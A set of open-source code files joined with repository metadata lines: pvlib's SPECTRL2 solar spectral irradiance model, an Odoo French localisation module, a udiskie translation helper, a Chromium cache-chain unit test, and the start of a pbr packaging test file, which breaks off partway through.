1.5872, 1.837, 2.005, 2.043, 1.987, 2.027, 1.896, 1.909, 1.927, 1.831,
1.891, 1.898, 1.892, 1.84, 1.768, 1.728, 1.658, 1.524, 1.531, 1.42,
1.399, 1.374, 1.373, 1.298, 1.269, 1.245, 1.223, 1.205, 1.183, 1.148,
1.091, 1.062, 1.038, 1.022, 0.9987, 0.9472, 0.8932, 0.8682, 0.8297,
0.8303, 0.814, 0.7869, 0.7683, 0.767, 0.7576, 0.6881, 0.6407, 0.6062,
0.5859, 0.5702, 0.5641, 0.5442, 0.5334, 0.5016, 0.4775, 0.4427, 0.44,
0.4168, 0.3914, 0.3589, 0.3275, 0.3175, 0.3073, 0.3004, 0.2928, 0.2755,
0.2721, 0.2593, 0.2469, 0.244, 0.2435, 0.2348, 0.2205, 0.1908, 0.1711,
0.1445, 0.1357, 0.123, 0.1238, 0.113, 0.1085, 0.0975, 0.0924, 0.0824,
0.0746, 0.0683, 0.0638, 0.0495, 0.0485, 0.0386, 0.0366, 0.032, 0.0281,
0.0248, 0.0221, 0.0196, 0.0175, 0.0157, 0.0141, 0.0127, 0.0115, 0.0104,
0.0095, 0.0086
]
_SPECTRL2_COEFFS['water_vapor_absorption'] = [
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.075, 0.0, 0.0, 0.0, 0.0, 0.016, 0.0125, 1.8, 2.5, 0.061,
0.0008, 0.0001, 1e-05, 1e-05, 0.0006, 0.036, 1.6, 2.5, 0.5, 0.155, 1e-05,
0.0026, 7.0, 5.0, 5.0, 27.0, 55.0, 45.0, 4.0, 1.48, 0.1, 1e-05, 0.001, 3.2,
115.0, 70.0, 75.0, 10.0, 5.0, 2.0, 0.002, 0.002, 0.1, 4.0, 200.0, 1000.0,
185.0, 80.0, 80.0, 12.0, 0.16, 0.002, 0.0005, 0.0001, 1e-05, 0.0001, 0.001,
0.01, 0.036, 1.1, 130.0, 1000.0, 500.0, 100.0, 4.0, 2.9, 1.0, 0.4, 0.22,
0.25, 0.33, 0.5, 4.0, 80.0, 310.0, 15000.0, 22000.0, 8000.0, 650.0, 240.0,
230.0, 100.0, 120.0, 19.5, 3.6, 3.1, 2.5, 1.4, 0.17, 0.0045
]
_SPECTRL2_COEFFS['ozone_absorption'] = [
10.0, 4.8, 2.7, 1.35, 0.8, 0.38, 0.16, 0.075, 0.04, 0.019, 0.007, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.003, 0.006, 0.009, 0.014, 0.021, 0.03,
0.04, 0.048, 0.063, 0.075, 0.085, 0.12, 0.119, 0.12, 0.09, 0.065, 0.051,
0.028, 0.018, 0.015, 0.012, 0.01, 0.008, 0.007, 0.006, 0.005, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0
]
_SPECTRL2_COEFFS['mixed_absorption'] = [
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.15, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.0,
0.35, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.05, 0.3,
0.02, 0.0002, 0.00011, 1e-05, 0.05, 0.011, 0.005, 0.0006, 0.0, 0.005, 0.13,
0.04, 0.06, 0.13, 0.001, 0.0014, 0.0001, 1e-05, 1e-05, 0.0001, 0.001, 4.3,
0.2, 21.0, 0.13, 1.0, 0.08, 0.001, 0.00038, 0.001, 0.0005, 0.00015,
0.00014, 0.00066, 100.0, 150.0, 0.13, 0.0095, 0.001, 0.8, 1.9, 1.3, 0.075,
0.01, 0.00195, 0.004, 0.29, 0.025
]
def _spectrl2_transmittances(apparent_zenith, relative_airmass,
surface_pressure, precipitable_water, ozone,
optical_thickness, scattering_albedo, dayofyear):
"""
Calculate transmittance factors from Section 2 of Bird and Riordan 1984.
Parameters
----------
apparent_zenith, relative_airmass, surface_pressure, precipitable_water,
ozone, dayofyear: float or 1d np.array
One value per timestamp
optical_thickness, scattering_albedo: np.ndarray
Array with shape (122, N) where N is either 1 or len(apparent_zenith)
Returns
-------
earth_sun_distance_correction: float or 1d np.array
Same shape/type as apparent_zenith
rayleigh_transmittance, aerosol_transmittance, vapor_transmittance,
ozone_transmittance, mixed_transmittance, aerosol_scattering,
aerosol_absorption: np.ndarray
Array with shape (122, N) where N is len(apparent_zenith)
"""
# add a dimension so that each ndarray is 2d with shape (122, 1)
wavelength = _SPECTRL2_COEFFS['wavelength'][:, np.newaxis]
vapor_coeff = _SPECTRL2_COEFFS['water_vapor_absorption'][:, np.newaxis]
ozone_coeff = _SPECTRL2_COEFFS['ozone_absorption'][:, np.newaxis]
mixed_coeff = _SPECTRL2_COEFFS['mixed_absorption'][:, np.newaxis]
# ET spectral irradiance correction for earth-sun distance seasonality.
# Note that we only want the distance correction coefficient, so set
# solar_constant=1:
earth_sun_distance_correction = \
pvlib.irradiance.get_extra_radiation(dayofyear, method='spencer',
solar_constant=1) # Eq 2-2, 2-3
# Rayleigh scattering
# note: 101300 is used for consistentcy with reference; can't use
# atmosphere.get_absolute_airmass because it uses 101325
airmass = relative_airmass * surface_pressure / 101300
wavelength_um = wavelength / 1000
rayleigh_transmittance = np.exp(
# Note: the report uses 1.335 but spectrl2_2.c uses 1.3366
# -airmass / (wavelength_um**4 * (115.6406 - 1.335 / wavelength_um**2))
-airmass / (wavelength_um**4 * (115.6406 - 1.3366 / wavelength_um**2))
) # Eq 2-4
# Aerosol scattering and absorption, Eq 2-6
aerosol_transmittance = np.exp(-optical_thickness * relative_airmass)
# Water vapor absorption, Eq 2-8
aWM = vapor_coeff * precipitable_water * relative_airmass
vapor_transmittance = np.exp(-0.2385 * aWM / (1 + 20.07 * aWM)**0.45)
# Ozone absorption
ozone_max_height = 22
h0_norm = ozone_max_height / 6370
ozone_mass_numerator = (1 + h0_norm)
ozone_mass_denominator = np.sqrt(cosd(apparent_zenith)**2 + 2 * h0_norm)
ozone_mass = ozone_mass_numerator / ozone_mass_denominator # Eq 2-10
ozone_transmittance = np.exp(-ozone_coeff * ozone * ozone_mass) # Eq 2-9
# Mixed gas absorption, Eq 2-11
aM = mixed_coeff * airmass
# Note: the report uses 118.93, but spectrl2_2.c uses 118.3
# mixed_transmittance = np.exp(-1.41 * aM / (1 + 118.93 * aM)**0.45)
mixed_transmittance = np.exp(-1.41 * aM / (1 + 118.3 * aM)**0.45)
# split out aerosol components for diffuse irradiance calcs
aerosol_scattering = np.exp(
-scattering_albedo * optical_thickness * relative_airmass
) # Eq 3-9
aerosol_absorption = np.exp(
-(1 - scattering_albedo) * optical_thickness * relative_airmass
) # Eq 3-10
return (
earth_sun_distance_correction,
rayleigh_transmittance,
aerosol_transmittance,
vapor_transmittance,
ozone_transmittance,
mixed_transmittance,
aerosol_scattering,
aerosol_absorption,
)
def spectrl2(apparent_zenith, aoi, surface_tilt, ground_albedo,
surface_pressure, relative_airmass, precipitable_water, ozone,
aerosol_turbidity_500nm, dayofyear=None,
scattering_albedo_400nm=0.945, alpha=1.14,
wavelength_variation_factor=0.095, aerosol_asymmetry_factor=0.65):
"""
Estimate spectral irradiance using the Bird Simple Spectral Model
(SPECTRL2).
The Bird Simple Spectral Model [1]_ produces terrestrial spectra between
300 and 4000 nm with a resolution of approximately 10 nm. Direct and
diffuse spectral irradiance are modeled for horizontal and tilted surfaces
under cloudless skies. SPECTRL2 models radiative transmission, absorption,
and scattering due to atmospheric aerosol, water vapor, and ozone content.
Parameters
----------
apparent_zenith : numeric
Solar zenith angle [degrees]
aoi : numeric
Angle of incidence of the solar vector on the panel [degrees]
surface_tilt : numeric
Panel tilt from horizontal [degrees]
ground_albedo : numeric
Albedo [0-1] of the ground surface. Can be provided as a scalar value
if albedo is not spectrally-dependent, or as a 122xN matrix where
the first dimension spans the wavelength range and the second spans
the number of simulations. [unitless]
surface_pressure : numeric
Surface pressure [Pa]
relative_airmass : numeric
Relative airmass. The airmass model used in [1]_ is the `'kasten1966'`
model, while a later implementation by NREL uses the
`'kastenyoung1989'` model. [unitless]
precipitable_water : numeric
Atmospheric water vapor content [cm]
ozone : numeric
Atmospheric ozone content [atm-cm]
aerosol_turbidity_500nm : numeric
Aerosol turbidity at 500 nm [unitless]
dayofyear : numeric, optional
The day of year [1-365]. Must be provided if ``apparent_zenith`` is
not a pandas Series.
scattering_albedo_400nm : numeric, default 0.945
Aerosol single scattering albedo at 400nm. The default value of 0.945
is suggested in [1]_ for a rural aerosol model. [unitless]
alpha : numeric, default 1.14
Angstrom turbidity exponent. The default value of 1.14 is suggested
in [1]_ for a rural aerosol model. [unitless]
wavelength_variation_factor : numeric, default 0.095
Wavelength variation factor [unitless]
aerosol_asymmetry_factor : numeric, default 0.65
Aerosol asymmetry factor (mean cosine of scattering angle) [unitless]
Returns
-------
spectra : dict
A dict of arrays. With the exception of `wavelength`, which has length
122, each array has shape (122, N) where N is the length of the
input ``apparent_zenith``. All values are spectral irradiance
with units W/m^2/nm except for `wavelength`, which is in nanometers.
* wavelength
* dni_extra
* dhi
* dni
* poa_sky_diffuse
* poa_ground_diffuse
* poa_direct
* poa_global
Notes
-----
NREL's C implementation ``spectrl2_2.c`` [2]_ of the model differs in
several ways from the original report [1]_. The report itself also has
a few differences between the in-text equations and the code appendix.
The list of known differences is shown below. Note that this
implementation follows ``spectrl2_2.c``.
=================== ========== ========== ===============
Equation Report Appendix spectrl2_2.c
=================== ========== ========== ===============
2-4 1.335 1.335 1.3366
2-11 118.93 118.93 118.3
3-8 To' Tu' Tu'
3-5, 3-6, 3-7, 3-1 double Cs single Cs single Cs
2-5 kasten1966 kasten1966 kastenyoung1989
=================== ========== ========== ===============
References
----------
.. [1] Bird, R, and Riordan, C., 1984, "Simple solar spectral model for
direct and diffuse irradiance on horizontal and tilted planes at the
earth's surface for cloudless atmospheres", NREL Technical Report
TR-215-2436 doi:10.2172/5986936.
.. [2] Bird Simple Spectral Model: spectrl2_2.c.
https://www.nrel.gov/grid/solar-resource/spectral.html
"""
# values need to be np arrays for broadcasting, so unwrap Series if needed:
is_pandas = isinstance(apparent_zenith, pd.Series)
if is_pandas:
original_index = apparent_zenith.index
(apparent_zenith, aoi, surface_tilt, ground_albedo, surface_pressure,
relative_airmass, precipitable_water, ozone, aerosol_turbidity_500nm,
scattering_albedo_400nm, alpha, wavelength_variation_factor,
aerosol_asymmetry_factor) = \
tuple(map(np.asanyarray, [
apparent_zenith, aoi, surface_tilt, ground_albedo,
surface_pressure, relative_airmass, precipitable_water, ozone,
aerosol_turbidity_500nm, scattering_albedo_400nm, alpha,
wavelength_variation_factor, aerosol_asymmetry_factor]))
dayofyear = original_index.dayofyear.values
if not is_pandas and dayofyear is None:
raise ValueError('dayofyear must be specified if not using pandas '
'Series inputs')
# add a dimension so that each ndarray is 2d with shape (122, 1)
wavelength = _SPECTRL2_COEFFS['wavelength'][:, np.newaxis]
spectrum_et = _SPECTRL2_COEFFS['spectral_irradiance_et'][:, np.newaxis]
optical_thickness = \
pvlib.atmosphere.angstrom_aod_at_lambda(aod0=aerosol_turbidity_500nm,
lambda0=500, alpha=alpha,
lambda1=wavelength) # Eq 2-7
# Eq 3-16
scattering_albedo = scattering_albedo_400nm * \
np.exp(-wavelength_variation_factor * np.log(wavelength / 400)**2)
spectrl2 = _spectrl2_transmittances(apparent_zenith, relative_airmass,
surface_pressure, precipitable_water,
ozone, optical_thickness,
scattering_albedo, dayofyear)
D, Tr, Ta, Tw, To, Tu, Tas, Taa = spectrl2
spectrum_et_adj = spectrum_et * D
# spectrum of direct irradiance, Eq 2-1
Id = spectrum_et_adj * Tr * Ta * Tw * To * Tu
cosZ = cosd(apparent_zenith)
# Eq 3-17
Cs = np.where(wavelength <= 450, ((wavelength + 550)/1000)**1.8, 1.0)
ALG = np.log(1 - aerosol_asymmetry_factor) # Eq 3-14
BFS = ALG * (0.0783 + ALG * (-0.3824 - ALG * 0.5874)) # Eq 3-13
AFS = ALG * (1.459 + ALG * (0.1595 + ALG * 0.4129)) # Eq 3-12
Fs = 1 - 0.5 * np.exp((AFS + BFS * cosZ) * cosZ) # Eq 3-11
Fsp = 1 - 0.5 * np.exp((AFS + BFS / 1.8) / 1.8) # Eq 3.15
# evaluate the "primed terms" -- transmittances evaluated at airmass=1.8
primes = _spectrl2_transmittances(apparent_zenith, 1.8,
surface_pressure, precipitable_water,
ozone, optical_thickness,
scattering_albedo, dayofyear)
_, Trp, Tap, Twp, Top, Tup, Tasp, Taap = primes
# Note: not sure what the correct form of this equation is.
# The first coefficient is To' in Eq 3-8 but Tu' in the code appendix.
# spectrl2_2.c uses Tu'.
sky_reflectivity = (
# Top * Twp * Taap * (0.5 * (1-Trp) + (1-Fsp) * Trp * (1-Tasp))
Tup * Twp * Taap * (0.5 * (1-Trp) + (1-Fsp) * Trp * (1-Tasp))
) # Eq 3-8
# a common factor for 3-5 and 3-6
common_factor = spectrum_et_adj * cosZ * To * Tu * Tw * Taa
# Note: spectrl2_2.c differs from the report in how the Cs value is used.
# The two commented out lines match the report, while the following match
# spectrl2_2.c. With regard to Cs, the equations in the report and
# spectrl12_2.c are algebraically equivalent.
# Ir = common_factor * (1 - Tr**0.95) * 0.5 * Cs # Eq 3-5
# Ia = common_factor * Tr**1.5 * (1 - Tas) * Fs * Cs # Eq 3-6
Ir = common_factor * (1 - Tr**0.95) * 0.5 # Eq 3-5
Ia = common_factor * Tr**1.5 * (1 - Tas) * Fs # Eq 3-6
rs = sky_reflectivity
rg = ground_albedo
Ig = (Id * cosZ + Ir + Ia) * rs * rg / (1 - rs * rg) # Eq 3-7
# total scattered irradiance
# Note: see discussion about Cs above.
# Is = Ir + Ia + Ig # Eq 3-1
Is = (Ir + Ia + Ig) * Cs # Eq 3-1
# calculate spectral irradiance on a tilted surface, Eq 3-18
Ibeam = Id * cosd(aoi)
# don't need surface_azimuth if we provide projection_ratio
projection_ratio = cosd(aoi) / cosZ
Isky = pvlib.irradiance.haydavies(surface_tilt=surface_tilt,
surface_azimuth=None,
dhi=Is,
dni=Id,
dni_extra=spectrum_et_adj,
projection_ratio=projection_ratio)
ghi = Id * cosZ + Is
Iground = pvlib.irradiance.get_ground_diffuse(surface_tilt, ghi, albedo=rg)
Itilt = Ibeam + Isky + Iground
wavelength_1d = wavelength.reshape(-1) # only needs 1 dimension
return {
'wavelength': wavelength_1d,
'dni_extra': spectrum_et_adj,
'dhi': Is,
'dni': Id,
'poa_sky_diffuse': Isky,
'poa_ground_diffuse': Iground,
'poa_direct': Ibeam,
'poa_global': Itilt,
}
| bsd-3-clause |
dgzurita/odoo | addons/l10n_fr/l10n_fr.py | 336 | 2089 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class l10n_fr_report(osv.osv):
_name = 'l10n.fr.report'
_description = 'Report for l10n_fr'
_columns = {
'code': fields.char('Code', size=64),
'name': fields.char('Name'),
'line_ids': fields.one2many('l10n.fr.line', 'report_id', 'Lines', copy=True),
}
_sql_constraints = [
('code_uniq', 'unique (code)','The code report must be unique !')
]
class l10n_fr_line(osv.osv):
_name = 'l10n.fr.line'
_description = 'Report Lines for l10n_fr'
_columns = {
'code': fields.char('Variable Name', size=64),
'definition': fields.char('Definition'),
'name': fields.char('Name'),
'report_id': fields.many2one('l10n.fr.report', 'Report'),
}
_sql_constraints = [
('code_uniq', 'unique (code)', 'The variable name must be unique !')
]
class res_company(osv.osv):
_inherit = 'res.company'
_columns = {
'siret': fields.char('SIRET', size=14),
'ape': fields.char('APE'),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mathstuf/udiskie | udiskie/locale.py | 2 | 1105 | """
I18n utilities.
"""
import gettext
__all__ = ['_']
class Translator(object):
"""
Simple translation and message formatting utility.
"""
@classmethod
def create(cls, domain, localedir=None, languages=None):
"""
Create a new translator for the given domain.
Arguments are as in ``gettext.translation``.
"""
t = gettext.translation(domain, localedir, languages, fallback=True)
try:
# on python2 we want the unicode version:
g = t.ugettext
except AttributeError:
# which is the default in python3:
g = t.gettext
return cls(g)
def __init__(self, gettext):
"""Initialize a translator with the given gettext function."""
self._gettext = gettext
def __call__(self, text, *args, **kwargs):
"""Translate and then and format the text with ``str.format``."""
msg = self._gettext(text)
if args or kwargs:
return msg.format(*args, **kwargs)
else:
return msg
_ = Translator.create('udiskie')
| mit |
gfreed/android_external_chromium-org | chrome/common/extensions/docs/server2/cache_chain_object_store_test.py | 154 | 8532 | #!/usr/bin/env python
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from cache_chain_object_store import CacheChainObjectStore
from test_object_store import TestObjectStore
import unittest
class CacheChainObjectStoreTest(unittest.TestCase):
def setUp(self):
self._first = TestObjectStore('first', init={
'storage.html': 'storage',
})
self._second = TestObjectStore('second', init={
'runtime.html': 'runtime',
'storage.html': 'storage',
})
self._third = TestObjectStore('third', init={
'commands.html': 'commands',
'runtime.html': 'runtime',
'storage.html': 'storage',
})
self._store = CacheChainObjectStore(
(self._first, self._second, self._third))
def testGetFromFirstLayer(self):
self.assertEqual('storage', self._store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
# Found in first layer, stop.
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
# Cached in memory, won't re-query.
self.assertEqual('storage', self._store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
def testGetFromSecondLayer(self):
self.assertEqual('runtime', self._store.Get('runtime.html').Get())
# Not found in first layer but found in second.
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset())
# First will now have it cached.
self.assertEqual('runtime', self._first.Get('runtime.html').Get())
self._first.Reset()
# Cached in memory, won't re-query.
self.assertEqual('runtime', self._store.Get('runtime.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
def testGetFromThirdLayer(self):
self.assertEqual('commands', self._store.Get('commands.html').Get())
# As above but for third.
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# First and second will now have it cached.
self.assertEqual('commands', self._first.Get('commands.html').Get())
self.assertEqual('commands', self._second.Get('commands.html').Get())
self._first.Reset()
self._second.Reset()
# Cached in memory, won't re-query.
self.assertEqual('commands', self._store.Get('commands.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
def testGetFromAllLayers(self):
self.assertEqual({
'commands.html': 'commands',
'runtime.html': 'runtime',
'storage.html': 'storage',
}, self._store.GetMulti(('commands.html',
'runtime.html',
'storage.html')).Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# First and second will have it all cached.
self.assertEqual('runtime', self._first.Get('runtime.html').Get())
self.assertEqual('commands', self._first.Get('commands.html').Get())
self.assertEqual('commands', self._second.Get('commands.html').Get())
self._first.Reset()
self._second.Reset()
# Cached in memory.
self.assertEqual({
'commands.html': 'commands',
'runtime.html': 'runtime',
'storage.html': 'storage',
}, self._store.GetMulti(('commands.html',
'runtime.html',
'storage.html')).Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
def testPartiallyCachedInMemory(self):
self.assertEqual({
'commands.html': 'commands',
'storage.html': 'storage',
}, self._store.GetMulti(('commands.html', 'storage.html')).Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# runtime wasn't cached in memory, so stores should still be queried.
self.assertEqual({
'commands.html': 'commands',
'runtime.html': 'runtime',
}, self._store.GetMulti(('commands.html', 'runtime.html')).Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset())
def testNotFound(self):
self.assertEqual(None, self._store.Get('notfound.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# Not-foundedness shouldn't be cached.
self.assertEqual(None, self._store.Get('notfound.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
# Test some things not found, some things found.
self.assertEqual({
'runtime.html': 'runtime',
}, self._store.GetMulti(('runtime.html', 'notfound.html')).Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1, set_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
def testSet(self):
self._store.Set('hello.html', 'hello')
self.assertTrue(*self._first.CheckAndReset(set_count=1))
self.assertTrue(*self._second.CheckAndReset(set_count=1))
self.assertTrue(*self._third.CheckAndReset(set_count=1))
# Should have cached it.
self.assertEqual('hello', self._store.Get('hello.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
# Should have the new content.
self.assertEqual('hello', self._first.Get('hello.html').Get())
self.assertEqual('hello', self._second.Get('hello.html').Get())
self.assertEqual('hello', self._third.Get('hello.html').Get())
def testDel(self):
# Cache it.
self.assertEqual('storage', self._store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
# Delete it.
self._store.Del('storage.html')
self.assertTrue(*self._first.CheckAndReset(del_count=1))
self.assertTrue(*self._second.CheckAndReset(del_count=1))
self.assertTrue(*self._third.CheckAndReset(del_count=1))
# Not cached anymore.
self.assertEqual(None, self._store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset(get_count=1))
self.assertTrue(*self._second.CheckAndReset(get_count=1))
self.assertTrue(*self._third.CheckAndReset(get_count=1))
def testStartEmpty(self):
store = CacheChainObjectStore((self._first, self._second, self._third),
start_empty=True)
# Won't query delegate file systems because it starts empty.
self.assertEqual(None, store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset())
self.assertTrue(*self._second.CheckAndReset())
self.assertTrue(*self._third.CheckAndReset())
# Setting values will set on all delegates, though.
store.Set('storage.html', 'new content')
self.assertEqual('new content', store.Get('storage.html').Get())
self.assertTrue(*self._first.CheckAndReset(set_count=1))
self.assertTrue(*self._second.CheckAndReset(set_count=1))
self.assertTrue(*self._third.CheckAndReset(set_count=1))
self.assertEqual('new content', self._first.Get('storage.html').Get())
self.assertEqual('new content', self._second.Get('storage.html').Get())
self.assertEqual('new content', self._third.Get('storage.html').Get())
if __name__ == '__main__':
unittest.main()
| bsd-3-clause |
midma101/AndIWasJustGoingToBed | .venv/lib/python2.7/site-packages/pbr/tests/test_setup.py | 4 | 14278 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 OpenStack Foundation
# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import os
import sys
import tempfile
try:
import cStringIO as io
BytesIO = io.StringIO
except ImportError:
import io
BytesIO = io.BytesIO
import fixtures
import testscenarios
from pbr import packaging
from pbr.tests import base
class EmailTestCase(base.BaseTestCase):
def test_str_dict_replace(self):
string = 'Johnnie T. Hozer'
mapping = {'T.': 'The'}
self.assertEqual('Johnnie The Hozer',
packaging.canonicalize_emails(string, mapping))
class MailmapTestCase(base.BaseTestCase):
def setUp(self):
super(MailmapTestCase, self).setUp()
self.root_dir = self.useFixture(fixtures.TempDir()).path
self.mailmap = os.path.join(self.root_dir, '.mailmap')
def test_mailmap_with_fullname(self):
with open(self.mailmap, 'w') as mm_fh:
mm_fh.write("Foo Bar <[email protected]> Foo Bar <[email protected]>\n")
self.assertEqual({'<[email protected]>': '<[email protected]>'},
packaging.read_git_mailmap(self.root_dir))
def test_mailmap_with_firstname(self):
with open(self.mailmap, 'w') as mm_fh:
mm_fh.write("Foo <[email protected]> Foo <[email protected]>\n")
self.assertEqual({'<[email protected]>': '<[email protected]>'},
packaging.read_git_mailmap(self.root_dir))
def test_mailmap_with_noname(self):
with open(self.mailmap, 'w') as mm_fh:
mm_fh.write("<[email protected]> <[email protected]>\n")
self.assertEqual({'<[email protected]>': '<[email protected]>'},
packaging.read_git_mailmap(self.root_dir))
class SkipFileWrites(base.BaseTestCase):
scenarios = [
('changelog_option_true',
dict(option_key='skip_changelog', option_value='True',
env_key='SKIP_WRITE_GIT_CHANGELOG', env_value=None,
pkg_func=packaging.write_git_changelog, filename='ChangeLog')),
('changelog_option_false',
dict(option_key='skip_changelog', option_value='False',
env_key='SKIP_WRITE_GIT_CHANGELOG', env_value=None,
pkg_func=packaging.write_git_changelog, filename='ChangeLog')),
('changelog_env_true',
dict(option_key='skip_changelog', option_value='False',
env_key='SKIP_WRITE_GIT_CHANGELOG', env_value='True',
pkg_func=packaging.write_git_changelog, filename='ChangeLog')),
('changelog_both_true',
dict(option_key='skip_changelog', option_value='True',
env_key='SKIP_WRITE_GIT_CHANGELOG', env_value='True',
pkg_func=packaging.write_git_changelog, filename='ChangeLog')),
('authors_option_true',
dict(option_key='skip_authors', option_value='True',
env_key='SKIP_GENERATE_AUTHORS', env_value=None,
pkg_func=packaging.generate_authors, filename='AUTHORS')),
('authors_option_false',
dict(option_key='skip_authors', option_value='False',
env_key='SKIP_GENERATE_AUTHORS', env_value=None,
pkg_func=packaging.generate_authors, filename='AUTHORS')),
('authors_env_true',
dict(option_key='skip_authors', option_value='False',
env_key='SKIP_GENERATE_AUTHORS', env_value='True',
pkg_func=packaging.generate_authors, filename='AUTHORS')),
('authors_both_true',
dict(option_key='skip_authors', option_value='True',
env_key='SKIP_GENERATE_AUTHORS', env_value='True',
pkg_func=packaging.generate_authors, filename='AUTHORS')),
]
def setUp(self):
super(SkipFileWrites, self).setUp()
self.temp_path = self.useFixture(fixtures.TempDir()).path
self.root_dir = os.path.abspath(os.path.curdir)
self.git_dir = os.path.join(self.root_dir, ".git")
if not os.path.exists(self.git_dir):
self.skipTest("%s is missing; skipping git-related checks"
% self.git_dir)
return
self.filename = os.path.join(self.temp_path, self.filename)
self.option_dict = dict()
if self.option_key is not None:
self.option_dict[self.option_key] = ('setup.cfg',
self.option_value)
self.useFixture(
fixtures.EnvironmentVariable(self.env_key, self.env_value))
def test_skip(self):
self.pkg_func(git_dir=self.git_dir,
dest_dir=self.temp_path,
option_dict=self.option_dict)
self.assertEqual(
not os.path.exists(self.filename),
(self.option_value.lower() in packaging.TRUE_VALUES
or self.env_value is not None))
class GitLogsTest(base.BaseTestCase):
def setUp(self):
super(GitLogsTest, self).setUp()
self.temp_path = self.useFixture(fixtures.TempDir()).path
self.root_dir = os.path.abspath(os.path.curdir)
self.git_dir = os.path.join(self.root_dir, ".git")
self.useFixture(
